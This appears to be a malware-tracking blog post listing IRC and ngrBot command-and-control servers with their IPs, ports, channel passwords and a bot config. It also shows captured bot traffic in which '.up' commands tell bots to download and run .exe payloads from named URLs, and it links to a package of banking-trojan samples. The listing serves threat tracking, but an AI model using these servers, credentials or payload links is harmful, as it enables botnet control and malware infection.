Today i changed the template is better then dark and simple let me know if u like this template have fun
208.115.225.28(1k linux bots hosted in United States Limestone Networks Inc)
var $config = array(“server”=>”208.115.225.28”, “port”=>”4095”, “pass”=>””, “prefix”=>”BoT”, “maxrand”=>”3”, “chan”=>”#dadadu”, “chan2″=>”#dadadu”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” chanel #dada 123456 around 500 bots Local users: Current Local Users: 507 Max: 1018 Global users: Current Global Users: 507 Max: 1018 Now talking in #dada Joins: [A]BoT518 [BoT865@424B246F.A811AE52.793AADE4.IP] Modes On: [ #dada ] [ + ] Joins: [A]BoT987 [BoT645@6EF97CFD.41C04E64.3286894F.IP]Read more...
77.79.6.83(irc botnet hosted in Lithuania Siauliai Splius Uab)
Remote Host Port Number 77.79.6.83 1863 NICK |NeW|-{USA-XP|218168} USER 2181 “” “TsGh” :2181 JOIN #6 admin hosting infso: http://whois.domaintools.com/77.79.6.83
49mb malware samples
Here we go another malwares package around 50mb with banking trojans irc bots(ngrBot samples) have fun Download: http://adf.ly/2Gd5i
Unix.ArabChat.Net(irc botnet hosted in United States Edison Lomag Internet Services Llc)
Remote Host Port Number 208.185.80.73 6667 NICK n-251662 USER gtytcsb 0 0 :n-251662 JOIN #jon PONG :UAE.ArabChat.Net USERHOST n-251662 MODE n-251662 -x+B hosting infso: http://whois.domaintools.com/208.185.80.73
91.211.117.18(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number 213.251.170.52 80 91.211.117.18 1865 PASS ngrBot Now talking in #main Topic On: [ #main ] [ .up http://creatucurso.net/wp-admin/error_log.exe 32c92e5db2642cd842d7efcccb758889 -r ] Topic By: [ DCD ] hosting infso: http://whois.domaintools.com/91.211.117.18
www.ircperu.com(ngrBot hosted in Russian Federation Oao Webalta)
www.ircperu.com DNS_TYPE_A 92.241.165.160 92.241.165.160:1863 Nick: n{AT|XPa}plexwne Username: plexwne Server Pass: ngrBot Joined Channel: #IrcPeru with Password PeruRulz!! Channel Topic for Channel #IrcPeru: “.up http://formulasymanuales.net/images/modules/smiley/thumbsup.gif.exe 0e2faa16ba5ab03e7ab4102497e2fb8f , .mdns http://www.wellnessfarm-shop.de/shop/thumbs.txt” Private Message to Channel #IrcPeru: “[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s)” UPDATE: ircperu.com:1863 Remote Host Port Number 141.105.66.247 1863 PASS ngrBot NICK n{US|XPa}uxfxodg USER uxfxodgRead more...
server.boyrules.com(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 205.234.231.54 2345 NICK [USA|00|P|20878] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-3951 * 0 :COMPUTERNAME MODE [USA|00|P|20878] -ix JOIN #!loco! PONG 22 MOTD hosting infso: http://whois.domaintools.com/205.234.231.54
92.241.165.134(ngrBot hosted in Russian Federation Oao Webalta)
Remote Host Port Number 200.122.132.122 80 213.251.170.52 80 81.169.145.73 80 92.241.165.134 7654 PASS ngrBot NICK n{US|XPa}bbvvotv USER bbvvotv 0 0 :bbvvotv JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://coopeande5.com/imagenes/principal.jpg.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s) UPDATE: PRIVMSG #oldgold :[DNS]: BlockedRead more...
Packed.Win32.Katusha(malware hosted in Netherlands Amsterdam Nforce Entertainment B.v)
dq.javagames7.com Resolved : [ dq.javagames7.com ] To [ 109.201.135.61 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.60 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.62 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.63 ] – TCP Connection Attempts: 109.201.135.63:8800 109.201.135.61:8800 109.201.135.62:8800 109.201.135.60:8800 exe file: http://31.184.237.180/dqs.exe hosting infos: http://whois.domaintools.com/109.201.135.63